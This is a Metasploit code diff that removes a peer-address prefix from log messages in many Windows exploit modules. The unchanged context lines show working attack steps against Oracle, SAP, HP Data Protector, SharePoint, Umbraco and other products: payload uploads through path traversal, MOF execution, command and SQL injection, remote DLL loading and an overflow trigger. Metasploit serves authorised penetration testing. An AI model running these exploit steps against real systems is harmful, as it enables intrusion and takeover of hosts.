- print_status("#{peer} - Uploading the JSP payload") + print_status("Uploading the JSP payload") soap_request = "<soapenv:Envelope xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\" " soap_request << "xmlns:int=\"http://schemas.amberpoint.com/flashtunnel/interfaces\" " @@ -249,13 +249,13 @@ class Metasploit3 < Msf::Exploit::Remote }, 5) if res and res.code == 200 and res.body =~ /writeToFileResponse/ - print_status("#{peer} - JSP payload successfully uploaded") + print_status("JSP payload successfully uploaded") else - print_error("#{peer} - Failed to upload the JSP payload") + print_error("Failed to upload the JSP payload") return end - print_status("#{peer} - Executing the uploaded JSP #{@jsp_name}.jsp ...") + print_status("Executing the uploaded JSP #{@jsp_name}.jsp ...") res = send_request_cgi( { 'uri' => "/#{@jsp_name}.jsp", diff --git a/modules/exploits/windows/http/oracle_endeca_exec.rb b/modules/exploits/windows/http/oracle_endeca_exec.rb index fd94612b71..3e8ce2702c 100644 --- a/modules/exploits/windows/http/oracle_endeca_exec.rb +++ b/modules/exploits/windows/http/oracle_endeca_exec.rb @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote version = version_match[1] end - vprint_status("#{peer} - Version found: Oracle Endeca Server #{version}") + vprint_status("Version found: Oracle Endeca Server #{version}") if version =~ /7\.4\.0/ and version <= "7.4.0.787" return Exploit::CheckCode::Appears @@ -131,7 +131,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") execute_command(command) end diff --git a/modules/exploits/windows/http/oracle_event_processing_upload.rb b/modules/exploits/windows/http/oracle_event_processing_upload.rb index 3a580df1fb..853c55c046 100644 --- a/modules/exploits/windows/http/oracle_event_processing_upload.rb +++ b/modules/exploits/windows/http/oracle_event_processing_upload.rb @@ -86,22 +86,22 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Generating payload and mof file...") + print_status("Generating payload and mof file...") mof_name = "#{rand_text_alpha(rand(5)+5)}.mof" exe_name = "#{rand_text_alpha(rand(5)+5)}.exe" exe_content = generate_payload_exe mof_content = generate_mof(mof_name, exe_name) - print_status("#{peer} - Uploading the exe payload #{exe_name}...") + print_status("Uploading the exe payload #{exe_name}...") exe_traversal = "#{traversal}WINDOWS/system32/#{exe_name}" res = upload(exe_traversal, exe_content) unless res && res.code == 200 && res.body.blank? - print_error("#{peer} - Unexpected answer, trying anyway...") + print_error("Unexpected answer, trying anyway...") end register_file_for_cleanup(exe_name) - print_status("#{peer} - Uploading the MOF file #{mof_name}") + print_status("Uploading the MOF file #{mof_name}") mof_traversal = "#{traversal}WINDOWS/system32/wbem/mof/#{mof_name}" upload(mof_traversal, mof_content) register_file_for_cleanup("wbem/mof/good/#{mof_name}") diff --git a/modules/exploits/windows/http/rejetto_hfs_exec.rb b/modules/exploits/windows/http/rejetto_hfs_exec.rb index 7c24bcaf8f..41cbf1fae9 100644 --- a/modules/exploits/windows/http/rejetto_hfs_exec.rb +++ b/modules/exploits/windows/http/rejetto_hfs_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote end def on_request_uri(cli, req) - print_status("#{peer} - Payload request received: #{req.uri}") + print_status("Payload request received: #{req.uri}") exe = generate_payload_exe vbs = Msf::Util::EXE.to_exe_vbs(exe) send_response(cli, vbs, {'Content-Type' => 'application/octet-stream'}) diff --git a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb index ee531318fd..06dc9a7abb 100644 --- a/modules/exploits/windows/http/sap_host_control_cmd_exec.rb +++ b/modules/exploits/windows/http/sap_host_control_cmd_exec.rb @@ -381,7 +381,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Testing command injection...") + print_status("Testing command injection...") res = send_request_cgi({ 'uri' => '/', @@ -453,7 +453,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Injecting system commands...") + print_status("Injecting system commands...") res = send_request_cgi({ 'uri' => '/', @@ -466,9 +466,9 @@ class Metasploit3 < Msf::Exploit::Remote }, 10) if (res and res.code == 500 and res.body =~ /Generic error/) - print_good("#{peer} - System command successfully injected") + print_good("System command successfully injected") else - print_error("#{peer} - Failed to inject system command") + print_error("Failed to inject system command") return end @@ -505,7 +505,7 @@ class Metasploit3 < Msf::Exploit::Remote </SOAP-ENV:Envelope> eos - print_status("#{peer} - Executing injected command") + print_status("Executing injected command") res = send_request_cgi({ 'uri' => '/', @@ -518,7 +518,7 @@ class Metasploit3 < Msf::Exploit::Remote }, 1) if res - print_error("#{peer} - Failed to execute injected command") + print_error("Failed to execute injected command") return end diff --git a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb index a61073ba6b..bf935718d0 100644 --- a/modules/exploits/windows/http/sepm_auth_bypass_rce.rb +++ b/modules/exploits/windows/http/sepm_auth_bypass_rce.rb @@ -63,7 +63,7 @@ class Metasploit4 < Msf::Exploit::Remote meterp = Rex::Text.rand_text_alpha(10) jsp = Rex::Text.rand_text_alpha(10) - print_status("#{peer} - Getting cookie...") + print_status("Getting cookie...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), @@ -89,7 +89,7 @@ class Metasploit4 < Msf::Exploit::Remote <%=SemLaunchService.getInstance().execute("CommonCMD", Arrays.asList("/c", System.getProperty("user.dir")+"\\\\..\\\\webapps\\\\ROOT\\\\#{meterp}.exe")) %> } - print_status("#{peer} - Uploading payload...") + print_status("Uploading payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -110,7 +110,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{meterp}.exe") - print_status("#{peer} - Uploading JSP page to execute the payload...") + print_status("Uploading JSP page to execute the payload...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, 'servlet', 'ConsoleServlet'), 'method' => 'POST', @@ -131,7 +131,7 @@ class Metasploit4 < Msf::Exploit::Remote register_file_for_cleanup("../tomcat/webapps/ROOT/#{jsp}.jsp") - print_status("#{peer} - Executing payload. Manual cleanup will be required.") + print_status("Executing payload. Manual cleanup will be required.") send_request_cgi({ 'uri' => normalize_uri(target_uri.path, "#{jsp}.jsp") }, 5) diff --git a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb index 5bd2bfab84..4638454fcb 100644 --- a/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb +++ b/modules/exploits/windows/http/sonicwall_scrutinizer_sqli.rb @@ -77,7 +77,7 @@ class Metasploit3 < Msf::Exploit::Remote php_fname = Rex::Text.rand_text_alpha(5) + ".php" rnd_txt = Rex::Text.rand_text_alpha_upper(3) - print_status("#{peer} - Sending SQL injection...") + print_status("Sending SQL injection...") res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), 'method' => 'POST', @@ -88,10 +88,10 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.body !~ /No Results Found/ - print_error("#{peer} - I don't think the SQL Injection attempt worked") + print_error("I don't think the SQL Injection attempt worked") return elsif not res - print_error("#{peer} - No response from the server") + print_error("No response from the server") return end @@ -99,7 +99,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status(res.to_s) target_path = "#{File.dirname(target_uri.path)}/#{php_fname}" - print_status("#{peer} - Requesting: #{target_path}") + print_status("Requesting: #{target_path}") send_request_raw({'uri' => normalize_uri(target_path)}) handler diff --git a/modules/exploits/windows/http/trackit_file_upload.rb b/modules/exploits/windows/http/trackit_file_upload.rb index da07199b52..1d33984b1e 100644 --- a/modules/exploits/windows/http/trackit_file_upload.rb +++ b/modules/exploits/windows/http/trackit_file_upload.rb @@ -499,7 +499,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' @@ -507,7 +507,7 @@ class Metasploit3 < Msf::Exploit::Remote if res if res.code == 500 - print_error("#{peer} - Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) + print_error("Got HTTP 500, trying again with " + (@version == 9 ? "ASPX" : "ASPX")) # try again but now use ASPX instead of ASP or vice-versa if @version == 9 file_content = Msf::Util::EXE.to_exe_aspx(exe) @@ -521,7 +521,7 @@ class Metasploit3 < Msf::Exploit::Remote # sleep a few seconds, sometimes the service takes a while to write to disk sleep(datastore['SLEEP']) - print_status("#{peer} - Executing payload") + print_status("Executing payload") res = send_request_cgi({ 'uri' => normalize_uri(datastore['TARGETURI'], "Installers", filename), 'method' => 'GET' diff --git a/modules/exploits/windows/http/umbraco_upload_aspx.rb b/modules/exploits/windows/http/umbraco_upload_aspx.rb index 490f35f88d..683baf2a5c 100644 --- a/modules/exploits/windows/http/umbraco_upload_aspx.rb +++ b/modules/exploits/windows/http/umbraco_upload_aspx.rb @@ -71,7 +71,7 @@ class Metasploit3 < Msf::Exploit::Remote begin aspx = @upload_random + '.aspx' - print_status("#{peer} - Searching: #{aspx}") + print_status("Searching: #{aspx}") files = cli.fs.file.search("\\", aspx) if not files or files.empty? print_error("Unable to find #{aspx}. Please manually remove it.") @@ -79,10 +79,10 @@ class Metasploit3 < Msf::Exploit::Remote end files.each { |f| - print_warning("#{peer} - Deleting: #{f['path'] + "\\" + f['name']}") + print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{aspx} deleted") + print_good("#{aspx} deleted") rescue ::Exception => e print_error("Unable to delete #{aspx}: #{e.message}") end @@ -121,8 +121,8 @@ class Metasploit3 < Msf::Exploit::Remote # attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Uploading #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Uploading to #{uri_path}#{@upload_random}.aspx") + print_status("Uploading #{aspx.length} bytes through #{attack_url}...") + print_status("Uploading to #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -135,11 +135,11 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_status("#{peer} - Timeout: Trying to execute the payload anyway") + print_status("Timeout: Trying to execute the payload anyway") elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") + print_status("Didn't get the expected 500 error code #{attack_url} [#{res.code} #{res.message}]. Trying to execute the payload anyway") end # @@ -147,7 +147,7 @@ class Metasploit3 < Msf::Exploit::Remote # upload_path = uri_path + "#{@upload_random}.aspx" - print_status("#{peer} - Executing #{upload_path}...") + print_status("Executing #{upload_path}...") res = send_request_cgi({ 'uri' => upload_path, @@ -155,12 +155,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Execution failed on #{upload_path} [No Response]") + print_error("Execution failed on #{upload_path} [No Response]") return end if (res.code < 200 or res.code > 302) - print_error("#{peer} - Execution failed on #{upload_path} [#{res.code} #{res.message}]") + print_error("Execution failed on #{upload_path} [#{res.code} #{res.message}]") return end @@ -183,8 +183,8 @@ class Metasploit3 < Msf::Exploit::Remote eos attack_url = uri_path + "webservices/codeEditorSave.asmx" - print_status("#{peer} - Writing #{aspx.length} bytes through #{attack_url}...") - print_status("#{peer} - Wrting over #{uri_path}#{@upload_random}.aspx") + print_status("Writing #{aspx.length} bytes through #{attack_url}...") + print_status("Wrting over #{uri_path}#{@upload_random}.aspx") res = send_request_cgi({ 'uri' => attack_url, @@ -197,12 +197,12 @@ class Metasploit3 < Msf::Exploit::Remote }, 20) if (! res) - print_error("#{peer} - Deletion failed at #{attack_url} [No Response]") + print_error("Deletion failed at #{attack_url} [No Response]") return elsif (res.code = 500 and res.body =~ /Cannot use a leading .. to exit above the top directory/) - print_status("#{peer} - Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") + print_status("Got the expected 500 error code #{attack_url} [#{res.code} #{res.message}]") else - print_status("#{peer} - Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") + print_status("Didn't get the code and message #{attack_url} [#{res.code} #{res.message}]") end handler end diff --git a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb index 2466bffdee..0a8a6421b9 100644 --- a/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb +++ b/modules/exploits/windows/http/vmware_vcenter_chargeback_upload.rb @@ -67,17 +67,17 @@ class Metasploit3 < Msf::Exploit::Remote end if cli.type != 'meterpreter' - print_error("#{peer} - Meterpreter not used. Please manually remove #{@dropper}") + print_error("Meterpreter not used. Please manually remove #{@dropper}") return end cli.core.use("stdapi") if not cli.ext.aliases.include?("stdapi") begin - print_status("#{peer} - Searching: #{@dropper}") + print_status("Searching: #{@dropper}") files = cli.fs.file.search("\\", @dropper) if not files or files.empty? - print_error("#{peer} - Unable to find #{@dropper}. Please manually remove it.") + print_error("Unable to find #{@dropper}. Please manually remove it.") return end @@ -85,10 +85,10 @@ class Metasploit3 < Msf::Exploit::Remote print_warning("Deleting: #{f['path'] + "\\" + f['name']}") cli.fs.file.rm(f['path'] + "\\" + f['name']) } - print_good("#{peer} - #{@dropper} deleted") + print_good("#{@dropper} deleted") return rescue ::Exception => e - print_error("#{peer} - Unable to delete #{@dropper}: #{e.message}") + print_error("Unable to delete #{@dropper}: #{e.message}") end end @@ -127,7 +127,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - print_status("#{peer} - Uploading JSP to execute the payload") + print_status("Uploading JSP to execute the payload") exe = payload.encoded_exe exe_filename = rand_text_alpha(8) + ".exe" @@ -144,7 +144,7 @@ class Metasploit3 < Msf::Exploit::Remote fail_with(Failure::Unknown, "#{peer} - JSP upload failed") end - print_status("#{peer} - Executing payload") + print_status("Executing payload") send_request_cgi( { 'uri' => normalize_uri("cbmui", "images", dropper_filename), diff --git a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb index c064c4be86..e20af52a2a 100644 --- a/modules/exploits/windows/misc/bigant_server_dupf_upload.rb +++ b/modules/exploits/windows/misc/bigant_server_dupf_upload.rb @@ -96,26 +96,26 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}") end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") register_file_for_cleanup(exe_name) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") else if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/ - print_error("#{peer} - Upload failed, check the DEPTH option") + print_error("Upload failed, check the DEPTH option") end fail_with(Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb index b8fc3c811f..3626d62b2c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_cmd_exec.rb @@ -72,7 +72,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.08\.(\d+)/ minor = $1.to_i @@ -123,7 +123,7 @@ class Metasploit3 < Msf::Exploit::Remote self.file_contents = generate_payload_dll print_status("File available on #{unc}...") - print_status("#{peer} - Trying to execute remote DLL...") + print_status("Trying to execute remote DLL...") sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}" send_pkt(sploit) end diff --git a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb index cfa69e5d2f..5c85510fb9 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_exec_bar.rb @@ -70,7 +70,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -100,7 +100,7 @@ class Metasploit3 < Msf::Exploit::Remote # Windows 2008 Command Prompt Max Length is 8191 fail_with(Failure::BadConfig, "#{peer} - The selected payload is too long to execute through powershell in one command") end - print_status("#{peer} - Exploiting through Powershell...") + print_status("Exploiting through Powershell...") exec_bar(datastore['CMDPATH'], command, "\x00") end end diff --git a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb index b43d9af842..a61d414c6c 100644 --- a/modules/exploits/windows/misc/hp_dataprotector_traversal.rb +++ b/modules/exploits/windows/misc/hp_dataprotector_traversal.rb @@ -65,7 +65,7 @@ class Metasploit3 < Msf::Exploit::Remote return Exploit::CheckCode::Unknown end - print_status("#{peer} - HP Data Protector version #{fingerprint}") + print_status("HP Data Protector version #{fingerprint}") if fingerprint =~ /HP Data Protector A\.06\.(\d+)/ minor = $1.to_i @@ -92,11 +92,11 @@ class Metasploit3 < Msf::Exploit::Remote mof = generate_mof(mof_name, vbs_name) # We can't upload binary contents, so embedding the exe into a VBS. - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") + print_status("Sending malicious packet with opcode 42 to upload the vbs payload #{vbs_name}...") upload_file("windows\\system32\\#{vbs_name}", vbs) register_file_for_cleanup(vbs_name) - print_status("#{peer} - Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") + print_status("Sending malicious packet with opcode 42 to upload the mof file #{mof_name}") upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}") end diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb index 25e196293b..67a59e7911 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_34.rb @@ -134,10 +134,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -157,11 +157,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -197,7 +197,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb index f38eeb33a9..d9e85a05f9 100644 --- a/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb +++ b/modules/exploits/windows/misc/hp_operations_agent_coda_8c.rb @@ -136,10 +136,10 @@ user-agent: BBC 11.00.044; coda unknown version peer = "#{rhost}:#{rport}" - print_status "#{peer} - Ping host..." + print_status "Ping host..." res = ping if not res or res !~ /HTTP\/1\.1 200 OK/ or res !~ /server:.*coda/ - print_error("#{peer} - Host didn't answer correctly to ping") + print_error("Host didn't answer correctly to ping") return end @@ -159,11 +159,11 @@ user-agent: BBC 11.00.044; 14 eos - print_status("#{peer} - Sending HTTP Expect...") + print_status("Sending HTTP Expect...") sock.put(http_headers) res = sock.get_once if not res or res !~ /HTTP\/1\.1 100 Continue/ - print_error("#{peer} - Failed while sending HTTP Expect Header") + print_error("Failed while sending HTTP Expect Header") return end @@ -199,7 +199,7 @@ user-agent: BBC 11.00.044; 14 http_body << coda_request http_body << "\x0d\x0a\x0d\x0a" - print_status("#{peer} - Triggering overflow...") + print_status("Triggering overflow...") sock.put(http_body) disconnect diff --git a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb index b9be472306..b8b84e1f1c 100644 --- a/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb +++ b/modules/exploits/windows/misc/ibm_director_cim_dllinject.rb @@ -246,7 +246,7 @@ class Metasploit3 < Msf::Exploit::Remote def check peer = "#{rhost}:#{rport}" - print_status("#{peer} - Checking if CIMListener exists...") + print_status("Checking if CIMListener exists...") res = send_request_cgi({ 'uri' => "/CIMListener/", @@ -286,7 +286,7 @@ class Metasploit3 < Msf::Exploit::Remote vprint_status("Payload available at #{exploit_unc}#{share_name}\\#{basename}.dll") - print_status("#{peer} - Injecting DLL...") + print_status("Injecting DLL...") res = send_request_cgi({ 'uri' => "/CIMListener/#{exploit_unc}#{share_name}\\#{basename}.dll", @@ -302,7 +302,7 @@ class Metasploit3 < Msf::Exploit::Remote }) if res and res.code == 200 and res.body =~ /CIMVERSION/ - print_status"#{peer} - Then injection seemed to work..." + print_status"Then injection seemed to work..." else fail_with(Failure::Unknown, "#{peer} - Unexpected response") end diff --git a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb index ad3de555e3..1d451f3d3d 100644 --- a/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb +++ b/modules/exploits/windows/misc/manageengine_eventlog_analyzer_rce.rb @@ -60,7 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote def check # Check version - vprint_status("#{peer} - Trying to detect ManageEngine EventLog Analyzer") + vprint_status("Trying to detect ManageEngine EventLog Analyzer") res = send_request_cgi({ 'method' => 'GET', @@ -114,7 +114,7 @@ class Metasploit3 < Msf::Exploit::Remote def exploit - print_status("#{peer} - Retrieving JSESSION ID") + print_status("Retrieving JSESSION ID") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, 'event', 'index3.do'), @@ -122,12 +122,12 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID=(\w+);/ jsessionid = $1 - print_status("#{peer} - JSESSION ID Retrieved [ #{jsessionid} ]") + print_status("JSESSION ID Retrieved [ #{jsessionid} ]") else fail_with(Failure::Unknown, "#{peer} - Unable to retrieve JSESSION ID!") end - print_status("#{peer} - Access login page") + print_status("Access login page") res = send_request_cgi({ 'method' => 'POST', 'uri' => normalize_uri(uri, 'event', "j_security_check;jsessionid=#{jsessionid}"), @@ -143,14 +143,14 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 302 redirect = URI(res.headers['Location']) - print_status("#{peer} - Location is [ #{redirect} ]") + print_status("Location is [ #{redirect} ]") else fail_with(Failure::Unknown, "#{peer} - Access to login page failed!") end # Follow redirection process - print_status("#{peer} - Following redirection") + print_status("Following redirection") res = send_request_cgi({ 'uri' => "#{redirect}", 'method' => 'GET' @@ -158,7 +158,7 @@ class Metasploit3 < Msf::Exploit::Remote if res && res.code == 200 && res.get_cookies =~ /JSESSIONID/ cookies = res.get_cookies - print_status("#{peer} - Logged in, new cookies retrieved [#{cookies}]") + print_status("Logged in, new cookies retrieved [#{cookies}]") else fail_with(Failure::Unknown, "#{peer} - Redirect failed, unable to login with provided credentials!") end @@ -170,7 +170,7 @@ class Metasploit3 < Msf::Exploit::Remote jsp_payload = Rex::Text.encode_base64(generate_jsp_payload(cmd)).gsub(/\n/, '') - print_status("#{peer} - Executing SQL queries") + print_status("Executing SQL queries") # Remove large object in database, just in case it exists from previous exploit attempts sql = 'SELECT lo_unlink(-1)' @@ -203,7 +203,7 @@ class Metasploit3 < Msf::Exploit::Remote register_file_for_cleanup("..\\webapps\\event\\#{jsp_name}") - print_status("#{peer} - Executing JSP payload") + print_status("Executing JSP payload") res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(uri, jsp_name), diff --git a/modules/exploits/windows/misc/ms10_104_sharepoint.rb b/modules/exploits/windows/misc/ms10_104_sharepoint.rb index 5c46c811ed..c61e866b07 100644 --- a/modules/exploits/windows/misc/ms10_104_sharepoint.rb +++ b/modules/exploits/windows/misc/ms10_104_sharepoint.rb @@ -107,7 +107,7 @@ class Metasploit3 < Msf::Exploit::Remote filename = rand_text_alpha(rand(10)+5) + '.txt' contents = rand_text_alpha(rand(10)+5) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the test file #{filename}") + print_status("Sending HTTP ConvertFile Request to upload the test file #{filename}") res = upload_file(filename, contents) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ @@ -127,21 +127,21 @@ class Metasploit3 < Msf::Exploit::Remote mof_name = rand_text_alpha(rand(10)+5) + '.mof' mof = generate_mof(mof_name, exe_name) - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") + print_status("Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}") res = upload_file("WINDOWS\\system32\\#{exe_name}", exe) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{exe_name} uploaded successfully") + print_good("#{exe_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{exe_name}") + print_error("Failed to upload #{exe_name}") return end - print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") + print_status("Sending HTTP ConvertFile Request to upload the mof file #{mof_name}") res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof) if res and res.code == 200 and res.body =~ /ConvertFileResponse/ and res.body =~ /<m_ce>CE_OTHER<\/m_ce>/ - print_good("#{peer} - #{mof_name} uploaded successfully") + print_good("#{mof_name} uploaded successfully") else - print_error("#{peer} - Failed to upload #{mof_name}") + print_error("Failed to upload #{mof_name}") return end diff --git a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb index 9641fcacc5..0b08956557 100644 --- a/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb +++ b/modules/exploits/windows/misc/sap_netweaver_dispatcher.rb @@ -136,12 +136,12 @@ class Metasploit3 < Msf::Exploit::Remote pkt << diagheader pkt << user_connect pkt << support_data - print_status("#{peer} - Sending initialize packet to the SAP Dispatcher") + print_status("Sending initialize packet to the SAP Dispatcher") sock.put(pkt) res = sock.get_once(-1) if not res - print_error("#{peer} - The connection with the Dispatcher has not been initialized") + print_error("The connection with the Dispatcher has not been initialized") return end @@ -162,7 +162,7 @@ class Metasploit3 < Msf::Exploit::Remote crash << payload.encoded end - print_status("#{peer} - Sending crafted message") + print_status("Sending crafted message") message = "\x10\x06\x20" + [crash.length].pack("n") + crash diagheader = "\x00\x00\x00\x00\x00\x00\x00\x00" step = "\x10\x04\x26\x00\x04\x00\x00\x00\x01" diff --git a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb index b2a11ea670..c929b1db48 100644 --- a/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb +++ b/modules/exploits/windows/misc/solidworks_workgroup_pdmwservice_file_write.rb @@ -81,13 +81,13 @@ class Metasploit3 < Msf::Exploit::Remote res = sock.get_once disconnect if !res - vprint_error "#{peer} - Connection failed." + vprint_error "Connection failed." Exploit::CheckCode::Unknown elsif res == "\x00\x00\x00\x00" - vprint_status "#{peer} - Received reply (#{res.length} bytes)" + vprint_status "Received reply (#{res.length} bytes)" Exploit::CheckCode::Detected else - vprint_warning "#{peer} - Unexpected reply (#{res.length} bytes)" + vprint_warning "Unexpected reply (#{res.length} bytes)" 